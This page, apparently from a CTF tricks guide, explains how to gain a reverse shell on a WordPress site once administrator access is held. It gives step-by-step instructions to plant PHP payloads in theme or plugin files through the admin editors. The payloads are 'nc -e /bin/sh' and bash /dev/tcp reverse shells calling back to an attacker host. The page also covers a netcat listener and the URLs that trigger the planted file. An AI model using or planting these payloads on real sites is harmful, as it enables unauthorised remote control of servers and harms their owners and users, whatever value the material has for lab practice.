> For the complete documentation index, see [llms.txt](https://sarpers-organization.gitbook.io/ctftricks/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sarpers-organization.gitbook.io/ctftricks/_chapter-intro-7/webshell/initial-access-webshell-cms.md).

# Cms

## Wordpress Theme Editor PHP Reverse Shell

Once you have administrator access to the Wordpress site, navigate to `Appearance > Theme File Editor` in the admin panel.

Select the currently active theme and choose a file to edit, such as `404.php` or `footer.php`. Replace the existing content of the file with a PHP reverse shell payload like this:

```php
<?php system("nc -e /bin/sh <ATTACKER_IP> <ATTACKER_PORT>"); ?>
```

Alternatively, you can use a payload that utilizes `/dev/tcp` and the `exec` function:

```php
<?php
    exec("/bin/bash -c 'bash -i >& /dev/tcp/<ATTACKER_IP>/<ATTACKER_PORT> 0>&1'");
?>
```

This alternative attempts to establish a bash interactive shell using the `/dev/tcp` method, which can be effective if `system` is disabled or `nc -e` is not available.

Click "Update File" to save the changes.

Alternatively, if the Theme File Editor is unavailable or blocked, you can use the Plugin File Editor. Navigate to `Plugins > Plugin File Editor` in the admin panel. Select a plugin from the dropdown list and choose a file within that plugin to edit, such as the main plugin file (e.g., `plugin-name.php`). Replace the existing content of the chosen file with a PHP reverse shell payload. You can use the `system` based payload:

```php
<?php system("nc -e /bin/sh <ATTACKER_IP> <ATTACKER_PORT>"); ?>
```

Or the `exec` based payload:

```php
<?php
    exec("/bin/bash -c 'bash -i >& /dev/tcp/<ATTACKER_IP>/<ATTACKER_PORT> 0>&1'");
?>
```

Other PHP functions like `shell_exec` or `passthru` may also be capable of executing commands, depending on the server configuration.

Click "Update File" to save the changes to the plugin file.

On your attacker machine, set up a listener to catch the incoming connection using Netcat:

```bash
nc -lvnp <ATTACKER_PORT>
```

Finally, trigger the execution of the modified file by visiting its URL in a browser or with `curl`. For a modified `404.php` in the `twentyfifteen` theme, this might look like:

```
http://<TARGET_IP>/wp-content/themes/twentyfifteen/404.php
```

If you edited a plugin file, the URL would point to the plugin directory. For a modified `plugin-name.php` file, the URL might look like:

```
http://<TARGET_IP>/wp-content/plugins/plugin-name/plugin-name.php
```

Remember to replace `<ATTACKER_IP>`, `<ATTACKER_PORT>`, and `<TARGET_IP>` with the appropriate values. Ensure the payload is compatible with the target's environment (e.g., `nc -e` might need `netcat-traditional`, or the `/dev/tcp` method might be required).
